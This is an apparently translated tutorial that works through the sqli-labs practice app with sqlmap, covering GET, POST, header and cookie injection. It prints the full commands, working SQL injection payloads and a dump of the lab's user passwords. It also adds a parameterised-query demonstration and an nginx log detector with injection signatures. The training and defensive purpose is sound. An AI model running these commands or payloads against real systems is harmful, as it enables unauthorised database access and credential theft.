Introduction
The series Learning SQL Injection from sqli-labs (Less1-Less6) demonstrated manual injection; this article works through the same labs with sqlmap.
Installation
Install Python
My Windows 10 machine already has it (Python 3.8.6), so this step is skipped.
Download sqlmap
$ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
All of the commands below are run from inside the sqlmap-dev folder.
sqli-labs
Less-1 (GET-based injection)
UNION query injection
Checking for the injection point
$ python sqlmap.py -u "http://sqlilabs.bt/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=U -v 3
...
At the following prompt, answer Y:
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
...
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
...
When asked whether to keep testing the other parameters, answer N:
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
id is identified as a UNION query injection point:
sqlmap identified the following injection point(s) with a total of 29 HTTP(s) requests:
---
Parameter: id (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-7535' UNION ALL SELECT NULL,CONCAT(0x71766b6271,0x644d6a4547546f724e4f6a5943474779796379665674464b4a496f76655865696472594b54466848,0x7171627871),NULL-- -
Vector: UNION ALL SELECT NULL,[QUERY],NULL-- -
---
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
The output also shows the web server (nginx) and an approximate back-end version (MySQL >= 5.0.0; my environment runs MySQL 5.6).
--technique=TECH - SQL injection techniques to test (B boolean-based blind, E error-based, U UNION query, S stacked queries, T time-based blind; all are tried by default)
--dbms=DBMS - force the back-end DBMS to this value
--random-agent - use a randomly selected HTTP User-Agent header value
--flush-session - flush the session file for the current target
-v VERBOSE - verbosity level: 0-6 (default 1); level 3 also shows the injected payloads
Enumerating databases
$ python sqlmap.py -u "http://sqlilabs.bt/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=U -v 3 --dbs
...
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
Enumerating tables
$ python sqlmap.py -u "http://sqlilabs.bt/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=U -v 3 -D security --tables
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+
Enumerating a table's columns
$ python sqlmap.py -u "http://sqlilabs.bt/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=U -v 3 -D security -T users --columns
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
Dumping table contents
$ python sqlmap.py -u "http://sqlilabs.bt/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=U -v 3 -D security -T users --dump
Database: security
Table: users
[8 entries]
+----+------------+----------+
| id | password   | username |
+----+------------+----------+
| 1  | Dumb       | Dumb     |
| 2  | I-kill-you | Angelina |
| 3  | p@ssword   | Dummy    |
| 4  | crappy     | secure   |
| 5  | stupidity  | stupid   |
| 6  | genious    | superman |
| 7  | mob!le     | batman   |
| 8  | admin      | admin    |
+----+------------+----------+
Error-based injection
Checking for the injection point
$ python sqlmap.py -u "http://sqlilabs.bt/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=E -v 3
...
sqlmap identified the following injection point(s) with a total of 6 HTTP(s) requests:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1' AND EXTRACTVALUE(7938,CONCAT(0x5c,0x7176786a71,(SELECT (ELT(7938=7938,1))),0x716b626b71)) AND 'uYoJ'='uYoJ
Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
---
id is identified as an error-based injection point.
The remaining steps (enumerating databases, tables and columns, and dumping values) are the same as above.
Boolean-based blind injection
$ python sqlmap.py -u "http://sqlilabs.bt/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=B -v 3
...
sqlmap identified the following injection point(s) with a total of 19 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8085=8085 AND 'ZUiE'='ZUiE
Vector: AND [INFERENCE]
---
id is identified as a boolean-based blind injection point.
Time-based blind injection
$ python sqlmap.py -u "http://sqlilabs.bt/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=T -v 3
...
sqlmap identified the following injection point(s) with a total of 43 HTTP(s) requests:
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2422 FROM (SELECT(SLEEP(5)))mFjj) AND 'mKHO'='mKHO
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
id is identified as a time-based blind injection point.
In practice, time-based blind injection is the most widely applicable technique: UNION query injection needs the query result to be displayed, error-based injection needs the mysql_error() message to be displayed, and boolean-based blind injection needs true and false conditions to produce different responses. Its cost is that sqlmap has to wait out a sleep() for every inference, so it is also by far the slowest.
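To make the mechanism behind these four techniques concrete, here is an added example (not code from the original post or from sqli-labs) that re-creates the Less-1 pattern in Python with sqlite3: a row is looked up by id and echoed back. sqli-labs itself is PHP on MySQL; the rows are copied from the dump above, while the function names and the payload strings are constructed for this example (sqlite concatenates with `||` where the MySQL payloads above use CONCAT()). It shows the concatenated query returning other users' rows for a UNION payload and a true/false oracle for a boolean payload, and the bound-parameter version of the same query giving neither.

```python
"""Why the Less-1 payloads work, and why binding parameters stops them.

Added example, not code from the original post or from sqli-labs: an
in-memory sqlite3 re-creation of the Less-1 lookup. Rows are copied from
the dump above; function names and payloads are constructed here.
"""
import sqlite3

# Contents of security.users as dumped above: (id, username, password)
USERS = [
    (1, "Dumb", "Dumb"),
    (2, "Angelina", "I-kill-you"),
    (3, "Dummy", "p@ssword"),
    (4, "secure", "crappy"),
    (5, "stupid", "stupidity"),
    (6, "superman", "genious"),
    (7, "batman", "mob!le"),
    (8, "admin", "admin"),
]


def make_db():
    """Build an in-memory table shaped like security.users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Less-1 style: the value is pasted into the SQL text.

    A quote in user_id closes the string literal and everything after it
    is parsed as SQL, so the caller controls the rest of the statement.
    """
    sql = f"SELECT id, username, password FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, user_id):
    """Hardened: the value is bound by the driver and never parsed as SQL.

    The same payload is compared against the id column as one opaque string,
    so it matches nothing; true and false tautologies both give the same
    empty result, which also removes the boolean-blind oracle.
    """
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()


# Constructed inputs in the shape of the payloads sqlmap printed above.
# UNION: a non-existent id, then a second SELECT whose middle column lands
# in the echoed field; the trailing "-- -" comments out the original LIMIT.
UNION_PAYLOAD = "-7535' UNION ALL SELECT NULL, username||':'||password, NULL FROM users-- -"
# Boolean-based blind: a true and a false tautology appended to a valid id.
BOOL_TRUE = "1' AND 8085=8085 AND 'ZUiE'='ZUiE"
BOOL_FALSE = "1' AND 8085=8086 AND 'ZUiE'='ZUiE"


def demo():
    """Return (vulnerable, parameterised) results for a benign id and each payload."""
    conn = make_db()
    results = {}
    for label, value in [("benign", "1"), ("union", UNION_PAYLOAD),
                         ("bool_true", BOOL_TRUE), ("bool_false", BOOL_FALSE)]:
        results[label] = (lookup_vulnerable(conn, value),
                          lookup_parameterised(conn, value))
    return results


if __name__ == "__main__":
    for label, (vuln, safe) in demo().items():
        print(f"{label:10s} concatenated  -> {len(vuln)} row(s): {vuln[:2]}")
        print(f"{'':10s} parameterised -> {len(safe)} row(s): {safe}")
```

Run as a script, the concatenated query returns all eight username:password pairs for the UNION payload and one row versus none for the true/false pair (the oracle blind techniques rely on), while the bound query returns the same single row for the benign id and nothing for any payload.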
Less-11 (POST-based injection)
UNION query injection
Checking for the injection point (using -r)
Save the request captured with Burp Suite as a plain-text file, e.g. sqli-labs-less-11.txt, and put it in the sqlmap-dev folder (the sqlmap folder):
POST /Less-11/ HTTP/1.1
Host: sqlilabs.bt
Content-Length: 37
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://sqlilabs.bt
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://sqlilabs.bt/Less-11/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

uname=admin&passwd=2333&submit=Submit
Then load the request file with sqlmap's -r option:
$ python sqlmap.py -r sqli-labs-less-11.txt --dbms=MySQL --random-agent --flush-session --technique=U -v 3
...
POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 28 HTTP(s) requests:
---
Parameter: uname (POST)
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: uname=admin%' UNION ALL SELECT NULL,CONCAT(0x7170706271,0x485079745259634d616679727a597655584e76474c6748725a586d616d6f7a62676f4d7448794247,0x7178706a71)#&passwd=2333&submit=Submit
Vector: UNION ALL SELECT NULL,[QUERY]#
---
uname is identified as a UNION query injection point.
-r REQUESTFILE - load the HTTP request from a file
Checking for the injection point (using --data)
$ python sqlmap.py -u "http://sqlilabs.bt/Less-11/" --data="uname=admin&passwd=2333&submit=Submit" -p "uname" --dbms=MySQL --random-agent --flush-session --technique=U -v 3
...
POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 28 HTTP(s) requests:
---
Parameter: uname (POST)
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: uname=admin%' UNION ALL SELECT CONCAT(0x717a7a6a71,0x68556c4f5158426e5279434e756f6d504869485945715773746444554a4653794358484c65656c6a,0x7178767a71),NULL#&passwd=2333&submit=Submit
Vector: UNION ALL SELECT [QUERY],NULL#
---
uname is again identified as a UNION query injection point.
--data=DATA - data string to be sent through POST
-p TESTPARAMETER - testable parameter(s)
Less-18 (injection via the User-Agent request header)
Error-based injection
Checking for the injection point (using -r)
Save the request captured with Burp Suite as a plain-text file, e.g. sqli-labs-less-18.txt, put it in the sqlmap-dev folder (the sqlmap folder), and mark the injection point by hand with *: User-Agent: *
POST /Less-18/ HTTP/1.1
Host: sqlilabs.bt
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://sqlilabs.bt
Content-Type: application/x-www-form-urlencoded
User-Agent: *
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://sqlilabs.bt/Less-18/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

uname=admin&passwd=admin&submit=Submit
$ python sqlmap.py -r sqli-labs-less-18.txt --dbms=MySQL --random-agent --flush-session --technique=E -v 0 --level=3
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (1) values? [Y/n] Y
parameter 'User-Agent' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 720 HTTP(s) requests:
---
Parameter: User-Agent (User-Agent)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020410 Fedora/3.0.6-1.fc9 Firefox/3.0.6'||(SELECT 0x6455485a FROM DUAL WHERE 7808=7808 AND GTID_SUBSET(CONCAT(0x717a627671,(SELECT (ELT(1983=1983,1))),0x7171626a71),1983))||'
---
User-Agent is identified as an error-based injection point.
--level=3 - level 3 or higher is required before sqlmap tests the User-Agent header as an injection point. Note that --random-agent replaces the User-Agent header taken from the request file, so the * marker placed there is not picked up as a custom injection point (the result is reported as 'User-Agent (User-Agent)' rather than as a '(custom) HEADER' parameter), which is why the header is only tested once the level is raised.
-v 0 - show only Python tracebacks, errors and critical messages
Less-19 (injection via the Referer request header)
Error-based injection
Checking for the injection point (using -r)
Save the request captured with Burp Suite as a plain-text file, e.g. sqli-labs-less-19.txt, put it in the sqlmap-dev folder (the sqlmap folder), and mark the injection point by hand with *: Referer: *
POST /Less-19/ HTTP/1.1
Host: sqlilabs.bt
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://sqlilabs.bt
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: *
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

uname=admin&passwd=admin&submit=Submit
$ python sqlmap.py -r sqli-labs-less-19.txt --dbms=MySQL --random-agent --flush-session --technique=E -v 0
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
(custom) HEADER parameter 'Referer #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 248 HTTP(s) requests:
---
Parameter: Referer #1* ((custom) HEADER)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: '||(SELECT 0x506b4f51 FROM DUAL WHERE 4198=4198 AND GTID_SUBSET(CONCAT(0x716b766a71,(SELECT (ELT(3749=3749,1))),0x716a7a6271),3749))||'
---
Referer is identified as an error-based injection point.
P.S. Unlike Less-18, this one does not need --level=3 to find the injection point.
Less-20 (cookie-based injection)
UNION query injection
Checking for the injection point (using -r)
Save the request captured with Burp Suite as a plain-text file, e.g. sqli-labs-less-20.txt, put it in the sqlmap-dev folder (the sqlmap folder), and mark the injection point by hand with *: Cookie: uname=admin*
GET /Less-20/index.php HTTP/1.1
Host: sqlilabs.bt
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://sqlilabs.bt/Less-20/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: uname=admin*
Connection: close
$ python sqlmap.py -r sqli-labs-less-20.txt --dbms=MySQL --random-agent --flush-session --technique=U -v 3
...
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
...
do you want to URL encode cookie values (implementation specific)? [Y/n] n
...
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
...
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
...
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
...
sqlmap identified the following injection point(s) with a total of 23 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: uname=-1413' UNION ALL SELECT NULL,CONCAT(0x71716b7871,0x48586d697a467753574470624e646c6356764a5a43507a6e66677a6761547461435a6e56564a4866,0x7176627171),NULL-- -
Vector: UNION ALL SELECT NULL,[QUERY],NULL-- -
---
Cookie #1* ((custom) HEADER), i.e. the uname cookie, is identified as a UNION query injection point.
Checking for the injection point (using --cookie)
$ python sqlmap.py -u "http://sqlilabs.bt/Less-20/" --cookie="uname=admin*" --dbms=MySQL --random-agent --flush-session --technique=U -v 3
...
[13:56:32] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] n
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
...
do you want to URL encode cookie values (implementation specific)? [Y/n] n
...
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
...
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
...
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 23 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: uname=-4659' UNION ALL SELECT NULL,NULL,CONCAT(0x7162707671,0x555467654f774b49554a536a7154764d485445544968526362524a49536f67486a6c417161667353,0x716b627171)-- -
Vector: UNION ALL SELECT NULL,NULL,[QUERY]-- -
---
Cookie #1* ((custom) HEADER), i.e. the uname cookie, is again identified as a UNION query injection point.
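Every payload sqlmap reported above, whether in the Less-1 query string or in the User-Agent and Referer headers of Less-18 and Less-19, is also written to the web server's access log. Here is an added example (not part of the original post or of sqlmap) of a small detector over nginx combined-format log lines: it URL-decodes the request line, Referer and User-Agent fields and maps each payload to the technique name sqlmap printed. The log lines are constructed for this example and their payloads are modelled on the shapes shown above; the regular expressions and function names are this example's own. The combined format does not record the Cookie header, so a Less-20 style payload is only visible if $http_cookie is added to the log_format.

```python
"""Spot sqlmap-style injection payloads in nginx access-log lines.

Added example, not from the original post or from sqlmap. The log lines are
constructed for this example; their payloads are modelled on the shapes
sqlmap printed against sqli-labs above.
"""
import re
from urllib.parse import unquote_plus

# nginx "combined" log_format:
#   $remote_addr - $remote_user [$time_local] "$request" $status
#   $body_bytes_sent "$http_referer" "$http_user_agent"
# nginx writes '"', '\' and non-printable bytes in these fields as \xHH;
# this parser does not undo that escaping.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \d+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Most specific signature first: error-based and UNION payloads may also
# carry a tautology, so the order decides which label wins.
SIGNATURES = [
    ("time-based blind", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
    ("error-based", re.compile(r"\b(EXTRACTVALUE|UPDATEXML|GTID_SUBSET)\s*\(", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    # "AND 8085=8085": the same number on both sides of the comparison
    ("boolean-based blind", re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.I)),
]

# Constructed log lines (not captured traffic), one per technique seen above.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Sep/2021:13:56:32 +0800] "GET /Less-1/?id=1 HTTP/1.1" 200 712 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [18/Sep/2021:13:56:33 +0800] "GET /Less-1/?id=-7535%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x71766b6271%2C0x64%2C0x7171627871%29%2CNULL--%20- HTTP/1.1" 200 740 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [18/Sep/2021:13:56:34 +0800] "GET /Less-1/?id=1%27%20AND%20EXTRACTVALUE%287938%2CCONCAT%280x5c%2C0x7176786a71%29%29%20AND%20%27uYoJ%27%3D%27uYoJ HTTP/1.1" 200 880 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [18/Sep/2021:13:56:35 +0800] "GET /Less-1/?id=1%27%20AND%208085%3D8085%20AND%20%27ZUiE%27%3D%27ZUiE HTTP/1.1" 200 712 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [18/Sep/2021:13:56:36 +0800] "GET /Less-1/?id=1%27%20AND%20%28SELECT%202422%20FROM%20%28SELECT%28SLEEP%285%29%29%29mFjj%29%20AND%20%27mKHO%27%3D%27mKHO HTTP/1.1" 200 712 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [18/Sep/2021:13:56:37 +0800] "POST /Less-18/ HTTP/1.1" 200 1024 "http://sqlilabs.bt/Less-18/" "Mozilla/5.0 (X11; Linux i686) Firefox/3.0.6\'||(SELECT 0x6455485a FROM DUAL WHERE 7808=7808 AND GTID_SUBSET(CONCAT(0x717a627671,(SELECT (ELT(1983=1983,1))),0x7171626a71),1983))||\'"',
    '10.0.0.5 - - [18/Sep/2021:13:56:38 +0800] "POST /Less-19/ HTTP/1.1" 200 1024 "\'||(SELECT 0x506b4f51 FROM DUAL WHERE 4198=4198 AND GTID_SUBSET(CONCAT(0x716b766a71,(SELECT (ELT(3749=3749,1))),0x716a7a6271),3749))||\'" "Mozilla/5.0"',
]


def parse_line(line):
    """Split one combined-format line into its fields, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(text):
    """Return the technique name whose signature matches the decoded text, or None."""
    for name, pattern in SIGNATURES:
        if pattern.search(text):
            return name
    return None


def scan(lines):
    """Return (ip, field, technique) for every field of every line carrying a payload."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ("request", "referer", "agent"):
            technique = classify(unquote_plus(rec[field]))
            if technique:
                findings.append((rec["ip"], field, technique))
    return findings


if __name__ == "__main__":
    for ip, field, technique in scan(SAMPLE_LOG):
        print(f"{ip}: {technique} payload in {field}")
```

Matching on payload shape rather than on the client string matters here because the commands above all use --random-agent, so sqlmap's default User-Agent never appears in the log; the boolean signature is the noisiest of the four and is best combined with a request-rate check on the same source address.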
References
https://gitbook.cn/books/5ba8393639ea516190a9b8f8/index.html SQLMap 从入门到入狱详细指南 (SQLMap: a detailed guide from getting started to getting jailed)
https://www.sqlsec.com/2020/05/sqlilabs.html SQLI labs 靶场精简学习记录 (A concise study log of the SQLI labs target range)
https://www.cnblogs.com/peterpan0707007/p/7620048.html 【总结】sqli-labs Less(1-35) 小结 ([Summary] sqli-labs Less(1-35) recap)